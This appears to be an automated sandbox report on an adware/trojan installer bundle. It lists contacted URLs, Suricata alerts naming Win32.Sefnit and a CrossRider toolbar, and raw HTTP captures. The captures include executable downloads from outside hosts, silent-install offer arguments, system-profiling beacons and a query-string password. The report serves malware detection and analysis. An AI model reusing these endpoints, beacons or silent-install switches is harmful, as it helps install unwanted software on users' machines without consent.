hxxp://online.GOOBZO.com/online/ka.aspx?CV=2.0.0.0&ProductID=12000&UserID=e59a543c-07c1-4575-b0a1-b17d7cfac7a7&Password=l6G2E4Yn&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400137&SBPIDS=1&KA=1
hxxp://install.theswiftrecord.com/if?alpha=KnR0DWQ1TAl4TBt7WydrKzAnAGQqKHglaR9HYBwheCg+SiE/BRc8U35yeGlgJT0zDA5zRE9NX2J/J1FzKj8ICQxFfigTY34oYwwnDzcPIjcHKy8cOXkgNzIzUWhyOX8vV1kbfHoJcgoXLEdrfygHEwVcBVtxbw0gNXpRVHUnIh5YQUkVbkQ+J1E8UXUtLV4/BS8xNg9gKixnfGBKXHtNeC0gNhtlYQl8ZQgpM2gKMWA2JA5qaF0XVnN+MnkOMHo3XFhENjRpd296KHwIL192AmN4aW53XjkqJnQuGANJeyobOnprXyg/XXkcU3ZiN0x2anJ3XAV4W14ZeXU0cBN/UnhbT00HKWBVchxxPFxuETcSZHYIKi0KbX8yeC46DUZmMWg8Y31ZIiZXKmsAODB2CitxZHFZCGlXWEl/ZSc1ESN8ehgHAkVoNgc9OHQzVmZbAVw0OjErKkwgWS94NTEIChULKWhwawJ3IU55fxx2NCgGfGAzN1URKh4bDyQgL3Rcci8rDQ0YQXA8ExBxKmICNVNiQjwyZR4jAHtpZ3UuOQIXAjEXUlQ+Tz4iW3kPeUdIGR1hMm8XJV97QE8TNlAPYgAwejFuVFAAM2dNchg4AXtSL2R2OiUzeAYJfmUidEkjCw9qV2E= 8.34.112.140
hxxp://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS+zcBkvzl4= 23.51.123.27
hxxp://repjs.shopper-pro.com/app/ping.ashx?e=PcwT4QFtuPClUB4b/muCJQ2omNS/TGQz62ls PLHCLDT03ZwnpMmri4u 59fITlqw48A36x6z/KZIUDDHMapm6716HWP7Hb1hjZ3jwf MfnewapHV13X4PiY0VDEtXdazBaKXaEKdzFwqwK4Z/LB/gEuwwpt2SWXC/H/dL1Z3VIip4wN1YzN4vCUkFiosfAG2KwI4GpE9wLRXIwnBzB2/3N4YHUtLPnXNp0Ch2ZhfpvG4Lnbcm9hh1KSSkgkzJM10ClxJsX5qO1ZySIyJVh8lyiuy5/oVLbn9609pFHvExuwUbmkSx21501BK/ ntU4rG62wGX5XNu/pZ/pzprFy4hjGhmacv1G uLVTO15bsS9eEKXCI1fi6Q== 54.197.238.106
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8= 23.51.123.27
hxxp://www.appshat.com/thumbnails/icon/images/assets/7/c/7c9d412c730603d1d82b98a548a71bac.png 78.138.127.8
hxxp://stats.neomapobjectrack.com/installer.gif?action=finished&LFMR=_ffDll_0&app=70299&appver=&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C8E047339716492CBFDDEC56F18A5922PI&srcid=000805&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl3c210eWMxLCUlUElYR1VJRChhZmY9c210eWMmc3ViPTEmcHJvZHVjdD15dGE=,&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_36&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&procstarttime=1429400147&procruntime=14&rnd=1429400161 54.231.17.116
hxxp://repjs.shopper-pro.com/app/ping.ashx?e=lOCrbsNL2zVPNjxRBLtb46Du3SqXTq58t8f6YpiR28IQ9XpMu3JNONKN/VUSdNXb6lcFzkAHUgF82tgewNDgDyZMAOD3mcq6qIs V7Ds6CRuZZIi5/tojmg8l4itKbh/HiBn688lkcr8toCm18jzwzsvB25MJtnS1urDxSq54gttr9SYvZpGaeXM3AOyMolLPBrSiXJp6zDwzjuB3V4QuM0FiFjdakeNbnZd8xqzln9nWpr61EGbEgSa6Z efd4uyZD6A1psf2ya3UsgcT0aYJHseVKQaMUz7BRPf4VdiaQvtCk0QnWPYVQK7KLGzlI1AiokZJT/WBqlLNa42qc9fC50svZkBykprwLn5Ljfu1FSnkSnlVgA Q== 54.197.238.106
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4f0b436e9b257d53 87.245.216.25
hxxp://stats.neomapobjectrack.com/installer.gif?action=finished&LFMR=_ffDll_0&app=65743&appver=&ver=1_36_01_22&version_date=15-04-17&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C9FC24CEAAF94660B86494E2129E945CPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_43&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350029&asw=0&asw2=1082139141&asw3=-2147475456&asw4=34816&crtnm=na&procstarttime=1429400187&procruntime=10&rnd=1429400197 54.231.17.116
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1429400195 54.231.1.140
hxxp://ocsp2.globalsign.com/gscodesignsha2g2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQpEOCqbmTiQA9OjY//t2aa8NSkuwQUGUq4WuRNMaUU5V7sL6Mc+oCMMmsCEhEhZyg35kUM7JUe4UHDT5+Nwg== 108.162.232.205
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=800&n=deploy_nova_start_funnel_step_name&rnd=1429400192 54.231.1.140
hxxp://rep.shopper-pro.com/app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBq2mie6K97bhs4164GCUCrHofaoyXCfoQIRgpbKKs6jK/sEUd/BCBLE 1KakB36ssAyR0VhWfLz7rzCOqouSiOX3iSFFCNvSibmv2IW2mkLW4Sygye4Bx OK6Bbaa/22ORm1WAVEoCJveNGyFHqLUA65EYBtUaaJ2Vte0h/YpXnsUyuixSI4KbCwH m 6Vr7WAZARP6Tt9fppq73FZdDH/8= 54.197.238.106
hxxp://www.appshat.com/thumbnails/icon/images/assets/0/7/07fce0a4ff78cc7e6376e227f046ce06.png 78.138.127.8
hxxp://download.cdn.mozilla.net/pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar 87.245.216.26
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1429400193 54.231.1.140
hxxp://www.appshat.com/images/3.5stars.jpg 78.138.127.8
hxxp://sub.goveba.info/pinger?event_type=offer_accepted&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=youtubeaccelerator&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=1&index_in_screen=1&index_in_session=1&0.3328616623796952 54.192.47.181
hxxp://rep.shopper-pro.com/app/ping.ashx?e=yhrBLBbZM9WBOuidoZFbtbi3muUffR3jbLi6w5qijh6RoZJTpqsyZxASc9FSZWyoGYsEX4kIHlu/0mFZouDnPiqbL3WeaiLbzTMGWLRHpW9oALKR6u0dIfc/boITtVwp1P9gDFCZ6VapvGDt BB/ci1dbz JN6x9xuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJegMBsN/V/kj ukMkugzkCYw3hkUtKZ53m3WJytHC0lJh BoO5y99Rgk9gttj5ejpEBSr28YVyfPg8SfsOq8sVv 54.197.238.106
hxxp://install.theswiftrecord.com/ii?alpha=KnR0DWR/LWxbB0J/WydrKzAnAGQqKHglaR9HYBwheCg+SiE/BRc8U35yeGlgJT0zDA5zRE9NX2J/J1FzKj8ICQxFfigTY34oYwwnDzcPIjcHKy8cOXkgNzIzUWhyOX8vV1kbfHoJcgoXLEdrfygHEwVcBVtxbw0gNXpRVHUnIh5QVElyIFdveShjDS9WcBxibnZqc1k4PXU3JTEKaDQQdXVwYFs9IEohbV59YBpJahBvcFgGKhwTDSY2bCRXdy0gHlpHGwppQm8eS3RXchI9QjZrDzEsCGd7Mj1hYlgHJBY8OnprXTQ9BQkiWWppK1RjMnIWAUZ+XV1MNjFiRRMteXRLTksbKGdNcgU4ck5kFDdbPDh4YmJaJj1vJndkXQo1GjpqfHtOcT9ZJyAaIiZpFTVgPTIESXRVF3p4YS58Eio/OW1TSwAjYgEBP3kmXXJPYlwla2x+LF54MTg3ICJRE3ZTeSwnPkYwcgh0cQ8oPG0NP3QQe1oYIAYfGWZpJignI3NiXRtGGytoHBYFRxx5JwIrXzBrHBsdIkkqJWV8AiFdJw0tMDVOZiYuSiFrbHF0LE5kKnISSHtZYWMfUm8xfkEGemdRXkdSNm0cdC52MQUwQD4PYl5qU00GX20= 8.34.112.140
hxxp://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl 87.245.216.57
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=100&n=init_start_funnel_step_name&rnd=1429400147 54.231.1.140
hxxp://www.appshat.com/thumbnails/icon/images/assets/8/3/83a4cee7a59522b93ed0ae1fa73ce8f3.png 78.138.127.8
hxxp://www.appshat.com/js/lightbox.js 78.138.127.8
hxxp://dqoup4b5zs0bi.cloudfront.net/infv5/index/3428/bnd 54.192.47.29
hxxp://www.appshat.com/thumbnails/banner/images/assets/3/6/365640f122ef96f033f2f87c6308031e.png 78.138.127.8
hxxp://online.GOOBZO.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=1&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=20131113143800&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&XMLUpdateFailed=0&ElapsedTime=1429400151&SBPIDS=1
hxxp://stats.neomapobjectrack.com/apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C8E047339716492CBFDDEC56F18A5922PI&srcid=000805&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl3c210eWMxLCUlUElYR1VJRChhZmY9c210eWMmc3ViPTEmcHJvZHVjdD15dGE=,&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&installtime=1429400147&lifetime=0&silent=1&crtnm=na&procstarttime=1429400147&procruntime=14&rnd=1429400161 54.231.17.116
hxxp://stats.neomapobjectrack.com/installer.gif?action=finished&LFMR=_ffDll_0&app=70121&appver=&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C40EA91D545A44D7AC8E737686FDFCDBPI&srcid=000171&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl6dHNtdHljMCw4M2FiMGMzZS05OWRmLTQwOTgtODZkOS1lZjE1NTJhODZmNWUsIiwidW5xIjoiODNhYjBjM2UtOTlkZi00MDk4LTg2ZDktZWYxNTUyYTg2ZjVlIn19&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_32&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&procstarttime=1429400147&procruntime=16&rnd=1429400163 54.231.17.116
hxxp://www.appshat.com/thumbnails/icon/images/assets/d/d/ddb3b88cf98eb0220c9e6c252e376749.png 78.138.127.8
hxxp://www.appshat.com/thumbnails/icon/images/assets/6/a/6a12dc1a298e870b610a58a56ba0f5ec.jpg 78.138.127.8
hxxp://www.appshat.com/thumbnails/icon/images/assets/4/4/442a5f30204dd385d17de5848683274f.png 78.138.127.8
hxxp://sub.goveba.info/installer/ajax-bidl?offers[youtubeaccelerator][exec_args]=/S /MAG=smtyc &offers[swiftrecord][exec_args]=/np 1 /is smp1ua &offers[istartsurf][exec_args]=-silence -ptid=smt &offers[appshat_madness][exec_args]=/S /affid=appshatmadness&uid_orig=F6EC7CBD433C497E8CB84BD73DB5F5E3&uid=4a9fc2e26d3c3249b974ded373db7ae1&tokyo_csrf_key=30dac423b2616dcb0f6bc321e4d0a8d9&tokyo_csrf_timestamp=1429400111&ffInstalled=false&dfz=false&affid=thetetrisgame&sid=thetetrisgameezsg&country=UA&hostBrowser=ie&unique_id=false 54.192.47.181
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=300&n=deploy_start_funnel_step_name&rnd=1429400190 54.231.1.140
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=100&n=init_start_funnel_step_name&rnd=1429400187 54.231.1.140
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1429400158 54.231.1.140
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=900&n=deploy_ff_start_funnel_step_name&rnd=1429400154 54.231.1.140
hxxp://fonts.googleapis.com/css?family=Abel 64.233.164.95
hxxp://www.appshat.com/thumbnails/icon/images/assets/1/3/13ca8e322e15bc394d66a37bec12e3b4.png 78.138.127.8
hxxp://www.appshat.com/css/main.css 78.138.127.8
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w= 23.51.123.27
hxxp://www.appshat.com/css/lightbox.css 78.138.127.8
hxxp://www.appshat.com/images/4.5stars.jpg 78.138.127.8
hxxp://www.appshat.com/thumbnails/icon/images/assets/f/1/f1ed3cd0cae7a3524376e6f9369c7ab8.png 78.138.127.8
hxxp://repjs.shopper-pro.com/app/ping.ashx?e=eFCD8T/coiezrE/yDXLQyeSrE0ez3DjNAMrIyXaDBdMicvsFwQStECv5F5wArPI/YCpHZc9ZUaG4NIBMq aAlALMEicbqKjXqIs V7Ds6CRuZZIi5/tojmg8l4itKbh/HiBn688lkcr8toCm18jzwzsvB25MJtnS1urDxSq54gttr9SYvZpGaeXM3AOyMolLPBrSiXJp6zDwzjuB3V4QuM0FiFjdakeNbnZd8xqzln9nWpr61EGbEgSa6Z efd4uyZD6A1psf2ya3UsgcT0aYJHseVKQaMUz7BRPf4VdiaQvtCk0QnWPYVQK7KLGzlI1AiokZJT/WBqlLNa42qc9fC50svZkBykprwLn5Ljfu1FSnkSnlVgA Q== 54.197.238.106
www.youtube.com 216.58.209.206
time.windows.com 23.99.222.162


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

SURICATA UDPv4 invalid checksum
SURICATA IPv4 invalid checksum
ET TROJAN Win32.Sefnit
ET POLICY Executable served from Amazon S3
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
SURICATA STREAM SHUTDOWN RST invalid ack
SURICATA STREAM Packet with invalid ack
ET MALWARE Win32/Toolbar.CrossRider.A Checkin
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/4.0)

Traffic

GET /gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhZ1N/ArcYWNWqP8XWy7QmXA== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:38:24 GMT
Content-Type: application/ocsp-response
Content-Length: 1474
Connection: keep-alive
Set-Cookie: __cfduid=da855b453a90769c3e2ebc4bd4cfc71671429400304; expires=Sun, 17-Apr-16 23:38:24 GMT; path=/; domain=.globalsign.com; HttpOnly
X-Powered-By: Servlet/3.0; JBossAS-6
ETag: 1c51f3ecc2724774fad973af1d04a376adb9631e
Expires: Sun, 19 Apr 2015 06:00:45 GMT
Last-Modified: Sat, 18 Apr 2015 18:00:45 GMT
Cache-Control: max-age=180, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 1d9433ff22ac01b1-FRA
0..........0..... .....0......0...0......6.K....Z....a.B&Y.....2015041
8180045Z0u0s0K0... ........k..vY.d..X.R*.....C....n......>..t]..../
Pz...!gS....X..?....&\....20150418180045Z....20150419060045Z0...*.H...
........Ri2.^.w...7..."X...O......j^U.E.......lf)|1....*,......vF...Ox
......p..7o........h.;.)m.w|,.<g..B.............0P...).......g..|..
.........lJ.a(.[[email protected]. (~.G..uH.........J....b.......d..vG.<"
,....x..&....k&...O....C.*O!....) h.....=..$..Ky...0....!..'....0...0.
..0...........!:.D.....3...7..(0...*.H........0Q1.0...U....BE1.0...U..
..GlobalSign nv-sa1'0%..U....GlobalSign CodeSigning CA - G20...1503030
92435Z..150603082435Z0}1.0...U....BE1.0...U....GlobalSign nv-sa1:08..U
...1GlobalSign CodeSigning CA - G2 OCSP responder - 21.0...U....201503
031024000.."0...*.H.............0...........z..N#.)I{6&_.f.. ..*.-W...
.Z....."......(.u:..9...ET...}.._Z.sr);:.....~.t..&4.~....d....- ...p{
..7.E}......:C.. R../.J.w...Q.-.c....Y!.r:.."..X...V............&&z,K.
.Z...sg.PN.:C.....0f...o..(..w.s.6..%.}.ktU..HmK........!1hy`..(.w.`a.
.....=s..,cYt6).-........0..0...U....0.0...U...........0...U.%..0... .
......0... .....0......0...U......6.K....Z....a.B&Y...0...U.#..0....n.
.....>..t]..../Pz0...*.H..............."...Y...f.=...d..........Q.n
.S.....=..5[.F..F..=*.S..;....6.j...VNR|#.h.=..' ..T..PD.J.......k....
3..h....s...y.'.?....m...k.....V.^..uynl....6....<.[....x..#.Q..9.P
%s)-.I...m.?.j*.2..?;.P..X7w.........$.*.t.....5.p....4U.....R..Dc..q.
...'.e#uA*.FG].xz~...
<<< skipped >>>


GET /v4/sof-installer/267123711_198339_B48A115F?action1=xa.geoip&action2=visit&action3=smt.visit.istartsurf&update1=ref,smt&update2=identifier,installer&update3=version,6.6.86.1606&update4=nation,us&update5=language,en HTTP/1.1
Accept: */*
Accept-Encoding: */*
Connection: Keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36
Host: xa.xingcloud.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:35:41 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.84 ms","message":"store 4 action and 5 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Sat, 18 Apr 20
15 23:35:41 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.84 ms","message":"store 4 ac
tion and 5 update "}..0......


GET /v4/sof-installer/267123711_198339_B48A115F?action=smt.dlzip1.istartsurf.finish,2 HTTP/1.1


Accept: */*
Accept-Encoding: */*
Connection: Keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36
Host: xa.xingcloud.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:35:43 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.41 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Sat, 18 Apr 20
15 23:35:43 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.41 ms","message":"store 1 ac
tion and 0 update "}..0..



GET /mirror/nerocrossrider/appshat_generic.exe HTTP/1.1
Range: bytes=71389-142779
User-Agent: Better Installer(Mozilla)
Host: d3hm9b8fv0d908.cloudfront.net
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 71391
Connection: keep-alive
Date: Sun, 12 Apr 2015 05:05:02 GMT
x-amz-version-id: zdbgB_7owwl7Hq6LIKQBG0yBaPWISKtC
x-amz-meta-s3cmd-attrs: uid:500/gname:www/uname:www/gid:500/mode:33204/mtime:1415096893/atime:1415097003/ctime:1415096894
Cache-Control: max-age=3600
Last-Modified: Tue, 04 Nov 2014 11:01:28 GMT
ETag: "518879abe3170dabd172dfffcd165598"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 71389-142779/285558
Age: 3017
X-Cache: Hit from cloudfront
Via: 1.1 627cfcd63872f08990562b39898647d0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HV-NkKR7PXoSTOFoYJMAw_kUdT4-ze8smbl3XUkMIfoEe2dUGrL0ag==
...IK.#.ikv7..=....\z....if.J^.;,5!.._...MR..w.OX..&.....p:.........5.
L.iT.L.O.....7D.]b..........3.. 2=v.a.....^k....xp .`..y.1>...A.Q!.
.._.J.D.......j..].8v....>.P.\ei%..OU[.V.p.*ky..E*.D0).-l.B.....*..
aG.b^..T.yqu8.Np.'.Z&V`..-..2l..Bu.l ........4X.U..9p..}E|..J...".m..:
[email protected]$h...8D.s"..]......3.. .$..H.Sf.z.....q.Ke.....b......
.IO[[email protected].....].<.........g.mG
..as..ez|.C.......=p.^U|.`s6.).\).]........2j.....N....a...i\.m.<..
....8......z....=....i.s.2...r...n.=h.D".O.MN..a.S..f. .S.i....N>.O
;...>..4%.{.L....... m.....%.Hw.U<...."...ns.Z....).)`o:....O...
.0..SDt..|V.G...iU.d P..x..{`i[.X.Uh..@..`C...;6.\..y.]-W.... ...G9`.%
i~.G.......r#`...`...G....Z..KQA~'vL2XAM..(o......jU.....3........7...
[email protected].`....u...G......H.N.|..;#..G.n]J.Kx......t.i
f.8u.^....L..L..;..# 6...p ...........U..KU%....F...>....L.sZ.Cm.!.
.cllj...&.:......p..y.....ds_.....W..t2.,.I...Z..c.T?/&O...8..q..<:
Cp.....7&.D7.....e,2.)..G..FP.l. .N....(......I.......4&...8.1;...M...
=.2..%;.V).>[email protected].!..GHUZ.nnh..........n#.....F.v.S...
Zy.m..........;..k...3..(. .k.............,H.D.L.....K...`[.. C..7X.uq
.zV.t...m..`..H.....s.e..R.7...4.F..`.b!..N.pY...=%K...s.Tt*9.rR..A...
.xt.hR.k..25...=`...7.........&=....vK.A...4.d7y.....(....7.(..l.k...h
.C.w|..yP..#...lNI..\8....c...I&.h.[.=p... ...._......).;.>"@.....@
.n@..)...,....80.W......kh..z8.......W3S..E...3..H....^.t.L.\........3
G..b.....!.^....U......d..k.X...84P..%V........O._.rg.7.g..`G4.$u.
<<< skipped >>>


GET /gscodesignsha2g2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQpEOCqbmTiQA9OjY//t2aa8NSkuwQUGUq4WuRNMaUU5V7sL6Mc+oCMMmsCEhEhZyg35kUM7JUe4UHDT5+Nwg== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:38:23 GMT
Content-Type: application/ocsp-response
Content-Length: 1493
Connection: keep-alive
Set-Cookie: __cfduid=d3fe3747715ff8b733ea6a42fa554aafa1429400303; expires=Sun, 17-Apr-16 23:38:23 GMT; path=/; domain=.globalsign.com; HttpOnly
X-Powered-By: Servlet/3.0; JBossAS-6
ETag: c104c65f806af8fe26177ae55fa54087191fbd90
Expires: Sun, 19 Apr 2015 08:59:09 GMT
Last-Modified: Sat, 18 Apr 2015 20:59:09 GMT
Cache-Control: max-age=180, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 1d9433fa19500f75-FRA
0..........0..... .....0......0...0.......0?.....!...>., ......2015
0418205909Z0u0s0K0... ........)[email protected]...^./.....
2k...!g(7.E.....A.O.......20150418205909Z....20150419085909Z0...*.H...
............|..... ... Q.<v4....~..(.nC...=Pi.G-..~..G.7..`).3.d&].
.E.....x....[3...?N.U..H....>w.D5..M.....;o.W0...l.}xQ..q......z...
B.v.A......^..M.IT..,.........6.~..-.f......w.. ..(...y....4....Y.'..3
.u......x..G.c%...4iZ.Fb.HV,......^8.,cU.).e9i^.p~......J_R.....0...0.
..0...........!.}.*./..(.....C.0...*.H........0Z1.0...U....BE1.0...U..
..GlobalSign nv-sa100...U...'GlobalSign CodeSigning CA - SHA256 - G20.
..150318093923Z..150618083923Z0..1.0...U....BE1.0...U....GlobalSign nv
-sa1C0A..U...:GlobalSign CodeSigning CA - SHA256 - G2 OCSP responder -
 21.0...U....201503181039000.."0...*.H.............0..........]W0..;Cq
..t....H.mQ...C.PN...0...Z.p`xT`...g...^c.`....&S..<.w.......o&..,.
..n=.{i`\....Fhn.....i%.b,.IS... .]...Vh...~._i.Y......sF%...I..V.I]Kn
.x.....h........)...5..F.6m0;....l..B..d-.ha...>T._.o.7...."..e....
~5a...=..9.h'F>.X...k.l....gCC'[email protected]..
.U...........0...U.%..0... .......0... .....0......0...U.......0?.....
!...>., ....0...U.#..0....J.Z.M1...^./.....2k0...*.H...............
..&..Y.7).!......9s..~.N..4..uz.t.K2Y..=. ... .........W..8......9t.D.
.......V.d)...s.. ..4.v~r{~..*..&..}............D../TE.t.&V.e.........
l..1........y...--=|~..z..3j1..\..<..~..6.[.Z}'[email protected]._...,r..T...W.
K.<.<m...;z...k.=F..5........|Z..g.!......p...!..
<<< skipped >>>


GET /pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar HTTP/1.1
Host: download.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=1200000-1499999
Connection: keep-alive


HTTP/1.1 206 Partial Content
Last-Modified: Wed, 26 Nov 2014 16:59:55 GMT
ETag: "4b1e700-2dc5623-508c5f506dac8"
Server: Apache
X-Backend-Server: ftp3.dmz.scl3.mozilla.com
Content-Type: application/octet-stream
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
X-Cache-Info: cached
Cache-Control: max-age=336274
Expires: Wed, 22 Apr 2015 21:00:24 GMT
Date: Sat, 18 Apr 2015 23:35:50 GMT
Content-Range: bytes 1200000-1499999/47994403
Content-Length: 300000
Connection: keep-alive
,................L'...UM*..b...."..A.(.P`*.v..f...1.%.`.Xu...X# .d .".
 .B2!.J..U....Z1....ff.Q..)........v.S.B.D.. .U@X..`.AN....A.F.Q.E..U.
4..#=.Vy.b$..H.x...J..V&.Z.q...d....<.v.Q..*..p...,.1`%.Q.........H
.E..k*..Uj ..c ...S..I.Y....gz.aR.. .j...<\.xxE)..t.B..M.R.|..(...,
.Q..QD[_>.c..YcaA"X!T:...[j\...;2J...3.4.{.Mm.,..Q2....t<.Jw7..@
.al .......U .3....<....e%....R.....K.S=.3(.........K.>.|.%Q<
..,..H...X(. ....zg... tAh..Q...,...X1.H.E]kR.V.Q..q,ol.....Z..Hc....X
!.R....1mT...J.E..U.A#....mU...U.....s5.1 ...V2%h.c..........S.....b.&
.*YAj)G...F..#2....U.....C...d..ihR. .D`..J[m..Y.e....7Vv...D#1...X.A,
Z...|.t..KK..X.Z..|.c2..x........X2...Q....%......a.......-.L...S.....
